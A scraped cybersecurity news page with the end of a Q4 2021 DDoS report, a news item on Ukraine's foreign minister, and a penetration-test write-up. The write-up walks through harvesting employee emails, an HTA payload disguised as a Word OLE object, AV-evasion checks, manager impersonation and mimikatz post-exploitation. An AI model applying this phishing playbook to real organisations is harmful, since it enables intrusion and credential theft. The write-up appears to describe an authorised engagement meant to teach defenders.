  • Have a restrictive plan B ready for defense. This allows organizations to quickly restore business-critical services in the event of a DDoS attack.

Conclusion

On the one hand, Q4 met our expectations for this period; on the other, it surprised us. For example, instead of the expected increase in DDoS activity during major online sales, we saw a botnet lull. A feature of the quarter was the large number of very short DDoS attacks, as well as a slew of media reports about short but powerful attacks.

Now for our forecasts. Going by previous years’ trends, we expect Q1 2022 to produce roughly the same indicators as Q4 2021. But the situation in the world and, in particular, the cryptocurrency market is too volatile to make such a confident prediction. The bitcoin price has fallen to half its peak value, but remains high. It suffered a similar collapse in the middle of last year, but after that grew even stronger. If cryptocurrencies shoot up again, we could see a significant drop in the DDoS attack market, but if they sink even further, we will probably see an increase. It is impossible to predict which way it will go. But despite the lack of concrete information, we see no preconditions for any major fluctuations, and expect figures similar to those in Q4.

Report

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

There is a shell in your lunch-box

By
Steven Black (n0tst3)
-
0
a shell in your lunch-box

My team was recently engaged by a client (Hackme) to perform a black-box external penetration test. The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide. As such, asides, the company name, we were given “ZERO” information. 

The following details illustrate how we embarked upon this assessment which resulted in…

OSINT 101

We kicked off with some Open Source Intelligence (OSINT) 101 :). There are quite a number of open source intelligence tools – to assist in gathering emails, subdomains, hosts, employee names, etc from different public sources like search engines and shodan. There is an exhaustive list of such awesome tools here .

Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization.

With Google dork to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx” . Of course, our aim was not to tirelessly search for documents. Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents which is found in the “properties section” of the document (most especially Microsoft Word, PowerPoint and Excel). One can also use FOCA for this.

From this, I noticed that employees emails followed a particular naming convention – the first letter of the firstname + surname @ domain.com i.e. rakinyele@hackme[.]com.

Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following google dork syntax:

site:linkedin.com -inurl:dir “at Hackme” “Current”. A typical example is shown below using Google Inc as a reference company.

By hacking a script to automate the process, we copied out the firstnames, lastnames and the roles of the current employees of Hackme. A tiring approach is to manually crawl through the google pages in search for these names and role or one could also use GoogleScraper:

GoogleScraper -m http –keyword “site:linkedin.com -inurl:dir ‘at Hackme’ ‘Current'” –num-pages-for-keyword 3 –output-filename output.json

…and then the results:

Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv[.]com/ or any other converter that works for you.

…and then using your favorite word processor (word merge, notepad++, etc) or some good scriptfu skills, merge the firstname + lastname – to form your email list.

Now it’s time to feed our target list a payload…

Since we are simulating a black-box external attack, we decided (just like what an attacker would do) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via emails to employees of Hackme.

We also know that it is a common practice for some file type/extensions to be blocked by the organization’s email filters – to limit exposure to risk.

This then brings us to using Koadic C3 COM Command & Control, a very decent framework just like your Meterpreter or Empire.What made it really stand out asides the beautiful interface is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan local network for open SMB, pivot to another machine, load mimikatz and a lot more.

So we ran Koadic and set the necessary variables – using the “stager/js/mshta ” module (serves payloads in memory using MSHTA.exe HTML Applications)

The result was a spawn of our HTA payload url as evidenced in the screenshot above. However, we need our targets to execute our payload as “mshta payload_url”. In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC. Now we need to get this payload past our victim’s numerous defenses.

Here comes the tricky part – we needed a way to have the victim run “mshta payload_url” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.

Thankfully, we saw the tip on the left from Matt Nelson and interestingly, the team at NCCgroup have this implemented in Demiguise.

So here is our final payload saved as a .hta file

The next step typically is to send our .hta payload as an embedded OLE object.

The intended attack scenario was:

  1. Send a Microsoft word document with our .hta payload embedded as an OLE object.
  2. Get the user to open the word document and the embedded OLE object.
  3. This spawns a new process and we get a shell access into our victim’s PC.

Now we get to the interesting part, we need our victim to open the Microsoft word document and our payload.

 To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.

…and more recon

We need to know more about Hackme – specifically the culture and employees behaviour. The question we kept asking ourselves was “what would interest the employees?”

Where else to get this information than Glassdoor , a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.

After poring through reviews of Hackme on Glassdoor, we found some common themes:

and more recon

We need to know more about the target organization’s environment – specifically employees. The question we kept asking ourselves – what would interest the employees?

Where else to get this information than Glassdoor , a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.

After poring through reviews of the target organization on Glassdoor, we found some common themes:

1. Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.

2. Employees love the organization because they get free lunch.

But Wait!

Like the old saying goes, the fastest way to a man’s heart is through his stomach. So what better way to get the employees to open our payload embedded word document?

Send them an email – telling them there is a change in the FREE LUNCH menu starting from tomorrow.

Rather than send a random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal complete with Hackme email signature while observing the organization email culture. Now, how do we make our email more believable? By sending an email to Customer service/Help Desk with a service request and observing the email signature in the response.

… recon again???

We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.

We are halfway through sending our payload now. Have some patience and read on…

time to send our payload

From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like. I then created a new word document like the one shown below with a splitting image of Hackme document template with appropriate headers/footers.

…and then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word’s icon and also the caption to reflect our message.

Change the icon to Microsoft Word’s icon and also, change the caption to reflect your message.

Don’t forget the antivirus!!!

To check the AV detection rate of our payload – and to see if it will be flagged as malicious by Hackme antivirus solution (if any), we did a quick AV scan on nodistribute.comNodistribute.com was used because according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file as well.

AV Scan of our .hta payload (0 detections)

 …it’s time to send our email

If the target org does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager, Logistic Manager or Admin Manager’s email address. In this case, I created a Gmail account (yes, gmail works too) using the Logistic Manager’s first name and last name – and then spiced it up with his signature which was gotten earlier.

Let the shells in

Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!

What next?

The rest they often say is history. From here-on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems and even became domain admins etc.

In conclusion

All in all, this was a very fun engagement. Whilst it may take an attacker a month/2months/a year of dedication to break into an organization – through a loophole at the infrastructure level. It can be fairly easy for one to gain access by exploiting the human factor.

“Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.

The moral of the exercise is: Recon, recon and more recon – for a wise man once said “Give me six hours to chop down a tree and I will spend the first four sharpening the axe“.

article source

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

“His ultimate goal is to destroy Ukraine” – Ukrainian foreign minister

By
Steven Black (n0tst3)
-
0
Russia Ukraine

Ukrainian Minister of Foreign Affairs, Dmytro Kuleba says he knows what Russian President Vladimir Putin’s long-term objective is.

Ultimate Goal Is to Destroy Ukraine

“His ultimate goal is to destroy Ukraine. He’s not interested in parts of Ukraine. He is not interested in even keeping the entire country under his control,”

Kubela said, during a live interview with CNN’s Jake Tapper.

Putin “wants the idea of the Ukrainian statehood to fail. This is his objective.”

Kuleba’s comments come one day after President Vladimir Putin ordered troops into pro-Russian regions of eastern Ukraine just hours after he signed decrees recognizing the independence of the Moscow-backed regions.

“What I know for certain, and this was eloquently proved, regretfully, in his address yesterday, is that he hates [the] Ukrainian statehood, he believes that Ukraine has no right to exist,”

Kuleba said of Putin

Following the deployment of Russian troops into eastern Ukraine, US President Joe Biden said that such maneuvering constitutes the beginning of “an invasion.” In response, Biden announced what he labeled “the first tranche of sanctions,” including on two large financial institutions, Russian sovereign debt and Russian elites and their family members. 

Though Kuleba supports the sanctions as laid out by Biden, calling them an “important” message, he maintains they are insufficient as the situation stands now.

“No sanctions will be enough until Russian boots withdraw from Ukrainian soil,” said Kuleba on CNN. “This is [the] fundamental principle, that we have to keep putting pressure on Russia and we in Ukraine proceed from the fact that the sanctions announced today by President Biden is just the beginning of the process of deterring president Putin and making him withdraw.”

On the topic of specific forthcoming sanctions, Kuleba suggested no single option or possibility should be left off the global table.

“We want every instrument available to be used in order to stop Putin,” he said. “If the price of saving a country is the most, harshest sanctions possible, then we should go for the harshest sanctions possible.”

While Kuleba told Tapper that the moving of Russian troops into the Ukrainian-controlled parts of the Donbas region would mark another crossing of a line by Putin, he noted that the ongoing conflict manifests itself along a multitude of fronts.

“We should be aware of the simple fact: this is hybrid warfare. Russia can attack physically, but also Russian can attack us in cyberspace … We are in a dialogue with partners including the United States about the identification of these red lines which will be responded with sanctions,” he said, adding, “I want to make it clear that we have to get ready to act in a very swift manner because the situation can change literally every hour.”

Asked by Tapper to explain why the United States — which sits thousands of miles from Ukraine — ought to be invested in the conflict, Kuleba pointed to three key factors.

  • “First, in 1994 Ukraine abandoned its nuclear arsenal which was the third in size in the world … We abandoned it in return for security guarantees issued in particular by the United States. We were promised that if anyone attacks us, the United States would be among countries who will be helping us.”
  • “Second, what is happening in Ukraine is not only about Ukraine. President Putin challenges Euro-Atlantic order. If the West fails in Ukraine, the next target of Putin will be one of the NATO members on its eastern flank.”
  • “Third, if Putin succeeds in Ukraine, other players across the globe who want to change rules, who want to bypass the United States, they will see that this is possible, that the West is incapable of defending what it stands for.”

In summing up his explanation as to why the US involvement in the conflict is appropriate, Kuleba said: “All in all … Americans should be interested in keeping the world order as it stands and the future of this order is being decided right now in Ukraine.”

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose
1...434445...79Page 44 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.